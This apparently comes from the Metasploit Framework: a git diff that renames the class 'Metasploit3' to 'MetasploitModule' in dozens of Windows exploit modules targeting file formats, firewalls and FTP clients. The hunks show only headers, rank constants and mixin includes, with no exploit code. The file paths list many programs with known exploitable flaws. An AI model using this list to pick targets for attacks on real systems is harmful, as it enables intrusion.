a/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb b/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb index 52709c9794..1548ef7a32 100644 --- a/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb +++ b/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms13_071_theme.rb b/modules/exploits/windows/fileformat/ms13_071_theme.rb index e524c4a34b..5177d24d8a 100644 --- a/modules/exploits/windows/fileformat/ms13_071_theme.rb +++ b/modules/exploits/windows/fileformat/ms13_071_theme.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms14_017_rtf.rb b/modules/exploits/windows/fileformat/ms14_017_rtf.rb index 178fd02774..aba2907db5 100644 --- a/modules/exploits/windows/fileformat/ms14_017_rtf.rb +++ b/modules/exploits/windows/fileformat/ms14_017_rtf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms14_060_sandworm.rb b/modules/exploits/windows/fileformat/ms14_060_sandworm.rb index 12a76d2f09..c68ecb9be7 100644 --- a/modules/exploits/windows/fileformat/ms14_060_sandworm.rb +++ b/modules/exploits/windows/fileformat/ms14_060_sandworm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/ole' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb index da08b259a5..70879a135d 100644 --- a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb +++ b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/ole' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb b/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb index 2fae749a3d..34e74d6c31 100644 --- a/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb +++ b/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/ole' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb index 66df942f10..48157af3b3 100644 --- a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb b/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb index 9815d96b34..c45b2fbd7b 100644 --- a/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb +++ b/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb index f0b5395668..d6f086132f 100644 --- a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb +++ b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb index 3715060fab..772cf9a59f 100644 --- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb +++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb @@ -25,7 +25,7 @@ end end -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb index 91ec7bd6be..33887dd6e5 100644 --- a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb +++ b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mymp3player_m3u.rb b/modules/exploits/windows/fileformat/mymp3player_m3u.rb index 2de0c93213..e73e8a6b3a 100644 --- a/modules/exploits/windows/fileformat/mymp3player_m3u.rb +++ b/modules/exploits/windows/fileformat/mymp3player_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/netop.rb b/modules/exploits/windows/fileformat/netop.rb index a16320bc27..f89cbd3663 100644 --- a/modules/exploits/windows/fileformat/netop.rb +++ b/modules/exploits/windows/fileformat/netop.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb b/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb index 076e614bb2..fa46dcbcae 100644 --- a/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb +++ b/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/openoffice_ole.rb b/modules/exploits/windows/fileformat/openoffice_ole.rb index ad26ef2fbd..85aaa1f5b8 100644 --- a/modules/exploits/windows/fileformat/openoffice_ole.rb +++ b/modules/exploits/windows/fileformat/openoffice_ole.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb index 75ed8cc4d3..17350e5db9 100644 --- a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb +++ b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/orbital_viewer_orb.rb b/modules/exploits/windows/fileformat/orbital_viewer_orb.rb index dd958d8620..ba23f01b14 100644 --- a/modules/exploits/windows/fileformat/orbital_viewer_orb.rb +++ b/modules/exploits/windows/fileformat/orbital_viewer_orb.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ovf_format_string.rb b/modules/exploits/windows/fileformat/ovf_format_string.rb index 202fb38aba..d17be93da7 100644 --- a/modules/exploits/windows/fileformat/ovf_format_string.rb +++ b/modules/exploits/windows/fileformat/ovf_format_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb b/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb index fdd269942b..0c1416eb54 100644 --- a/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb +++ b/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/proshow_load_bof.rb b/modules/exploits/windows/fileformat/proshow_load_bof.rb index 7b5f803269..39a26a3059 100644 --- a/modules/exploits/windows/fileformat/proshow_load_bof.rb +++ b/modules/exploits/windows/fileformat/proshow_load_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/publishit_pui.rb b/modules/exploits/windows/fileformat/publishit_pui.rb index 6a260b10df..a77cd17b8e 100644 --- a/modules/exploits/windows/fileformat/publishit_pui.rb +++ b/modules/exploits/windows/fileformat/publishit_pui.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb b/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb index 0c922c9fd1..f39244cd4e 100644 --- a/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb +++ b/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/real_player_url_property_bof.rb b/modules/exploits/windows/fileformat/real_player_url_property_bof.rb index 861ac3d898..04f4942631 100644 --- a/modules/exploits/windows/fileformat/real_player_url_property_bof.rb +++ b/modules/exploits/windows/fileformat/real_player_url_property_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb index c3012abef6..03a9a8ad81 100644 --- a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb +++ b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb b/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb index 51179b1675..65584db42e 100644 --- a/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb +++ b/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/sascam_get.rb b/modules/exploits/windows/fileformat/sascam_get.rb index 7dcc8d9617..49acb4a06d 100644 --- a/modules/exploits/windows/fileformat/sascam_get.rb +++ b/modules/exploits/windows/fileformat/sascam_get.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/scadaphone_zip.rb b/modules/exploits/windows/fileformat/scadaphone_zip.rb index 23358f9ad6..037ec684f9 100644 --- a/modules/exploits/windows/fileformat/scadaphone_zip.rb +++ b/modules/exploits/windows/fileformat/scadaphone_zip.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb b/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb index a4676e030b..cb0f20199f 100644 --- a/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb +++ b/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/somplplayer_m3u.rb b/modules/exploits/windows/fileformat/somplplayer_m3u.rb index f4fb8022de..7f243b7e07 100644 --- a/modules/exploits/windows/fileformat/somplplayer_m3u.rb +++ b/modules/exploits/windows/fileformat/somplplayer_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb b/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb index 1d79f124e1..b005e87ed9 100644 --- a/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb index 476b0ed1ae..189433c05f 100644 --- a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb +++ b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb b/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb index 736e5311c5..1e6c0503bf 100644 --- a/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb +++ b/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/tugzip.rb b/modules/exploits/windows/fileformat/tugzip.rb index 5f822b0dae..4d12cb0ead 100644 --- a/modules/exploits/windows/fileformat/tugzip.rb +++ b/modules/exploits/windows/fileformat/tugzip.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ultraiso_ccd.rb b/modules/exploits/windows/fileformat/ultraiso_ccd.rb index 2ddbf829a4..2861864028 100644 --- a/modules/exploits/windows/fileformat/ultraiso_ccd.rb +++ b/modules/exploits/windows/fileformat/ultraiso_ccd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ultraiso_cue.rb b/modules/exploits/windows/fileformat/ultraiso_cue.rb index 5c706c6424..2124a0580c 100644 --- a/modules/exploits/windows/fileformat/ultraiso_cue.rb +++ b/modules/exploits/windows/fileformat/ultraiso_cue.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb index 8c4f170b83..9517eaab91 100644 --- a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb +++ b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/varicad_dwb.rb b/modules/exploits/windows/fileformat/varicad_dwb.rb index c6bd57e032..538b44d520 100644 --- a/modules/exploits/windows/fileformat/varicad_dwb.rb +++ b/modules/exploits/windows/fileformat/varicad_dwb.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/videocharge_studio.rb b/modules/exploits/windows/fileformat/videocharge_studio.rb index 68cbfde4ef..3ad0c240f7 100644 --- a/modules/exploits/windows/fileformat/videocharge_studio.rb +++ b/modules/exploits/windows/fileformat/videocharge_studio.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/videolan_tivo.rb b/modules/exploits/windows/fileformat/videolan_tivo.rb index 42b4cb395e..a7670ff4e0 100644 --- a/modules/exploits/windows/fileformat/videolan_tivo.rb +++ b/modules/exploits/windows/fileformat/videolan_tivo.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/videospirit_visprj.rb b/modules/exploits/windows/fileformat/videospirit_visprj.rb index 337be73d0c..6c8280bc0a 100644 --- a/modules/exploits/windows/fileformat/videospirit_visprj.rb +++ b/modules/exploits/windows/fileformat/videospirit_visprj.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/visio_dxf_bof.rb b/modules/exploits/windows/fileformat/visio_dxf_bof.rb index 0a35ce8bce..ad4e9a8306 100644 --- a/modules/exploits/windows/fileformat/visio_dxf_bof.rb +++ b/modules/exploits/windows/fileformat/visio_dxf_bof.rb @@ -4,7 +4,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb index b9474d67e7..92af418f47 100644 --- a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb +++ b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb b/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb index 0e83aa1d3e..cc8c810bb0 100644 --- a/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb +++ b/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vlc_realtext.rb b/modules/exploits/windows/fileformat/vlc_realtext.rb index 4048200658..9efaf4aa67 100644 --- a/modules/exploits/windows/fileformat/vlc_realtext.rb +++ b/modules/exploits/windows/fileformat/vlc_realtext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vlc_smb_uri.rb b/modules/exploits/windows/fileformat/vlc_smb_uri.rb index cab592fca2..a2e8842571 100644 --- a/modules/exploits/windows/fileformat/vlc_smb_uri.rb +++ b/modules/exploits/windows/fileformat/vlc_smb_uri.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vlc_webm.rb b/modules/exploits/windows/fileformat/vlc_webm.rb index dac5f66d9a..381d95bef2 100644 --- a/modules/exploits/windows/fileformat/vlc_webm.rb +++ b/modules/exploits/windows/fileformat/vlc_webm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vuplayer_cue.rb b/modules/exploits/windows/fileformat/vuplayer_cue.rb index 6169941ed8..a4c85b7258 100644 --- a/modules/exploits/windows/fileformat/vuplayer_cue.rb +++ b/modules/exploits/windows/fileformat/vuplayer_cue.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vuplayer_m3u.rb b/modules/exploits/windows/fileformat/vuplayer_m3u.rb index 4589c909f9..d903b448c3 100644 --- a/modules/exploits/windows/fileformat/vuplayer_m3u.rb +++ b/modules/exploits/windows/fileformat/vuplayer_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/watermark_master.rb b/modules/exploits/windows/fileformat/watermark_master.rb index af6a94c36b..85a01388d8 100644 --- a/modules/exploits/windows/fileformat/watermark_master.rb +++ b/modules/exploits/windows/fileformat/watermark_master.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/winamp_maki_bof.rb b/modules/exploits/windows/fileformat/winamp_maki_bof.rb index 0ee6a6a64b..4a9d750ab8 100644 --- a/modules/exploits/windows/fileformat/winamp_maki_bof.rb +++ b/modules/exploits/windows/fileformat/winamp_maki_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/winrar_name_spoofing.rb b/modules/exploits/windows/fileformat/winrar_name_spoofing.rb index 21385fe87f..451b5cdff1 100644 --- a/modules/exploits/windows/fileformat/winrar_name_spoofing.rb +++ b/modules/exploits/windows/fileformat/winrar_name_spoofing.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb index 7727f18446..07a51fe6c6 100644 --- a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/wireshark_packet_dect.rb b/modules/exploits/windows/fileformat/wireshark_packet_dect.rb index 614d173074..c9bc390b9c 100644 --- a/modules/exploits/windows/fileformat/wireshark_packet_dect.rb +++ b/modules/exploits/windows/fileformat/wireshark_packet_dect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/wm_downloader_m3u.rb b/modules/exploits/windows/fileformat/wm_downloader_m3u.rb index 0c6ee32cda..c30ee3fbb9 100644 --- a/modules/exploits/windows/fileformat/wm_downloader_m3u.rb +++ b/modules/exploits/windows/fileformat/wm_downloader_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb b/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb index e6f7b78680..85090b33ae 100644 --- a/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb +++ b/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb b/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb index 9e217df2a7..461b7f28bc 100644 --- a/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb +++ b/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb b/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb index a70e7da10a..97067e3539 100644 --- a/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb +++ b/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb index d3a93a3cfa..c2d91d9795 100644 --- a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb +++ b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/firewall/blackice_pam_icq.rb b/modules/exploits/windows/firewall/blackice_pam_icq.rb index b2aa38f375..af6d02d283 100644 --- a/modules/exploits/windows/firewall/blackice_pam_icq.rb +++ b/modules/exploits/windows/firewall/blackice_pam_icq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/firewall/kerio_auth.rb b/modules/exploits/windows/firewall/kerio_auth.rb index 09ec293453..3bcb0cf970 100644 --- a/modules/exploits/windows/firewall/kerio_auth.rb +++ b/modules/exploits/windows/firewall/kerio_auth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ftp/32bitftp_list_reply.rb b/modules/exploits/windows/ftp/32bitftp_list_reply.rb index 88764b31c3..72d911d5a4 100644 --- a/modules/exploits/windows/ftp/32bitftp_list_reply.rb +++ b/modules/exploits/windows/ftp/32bitftp_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git 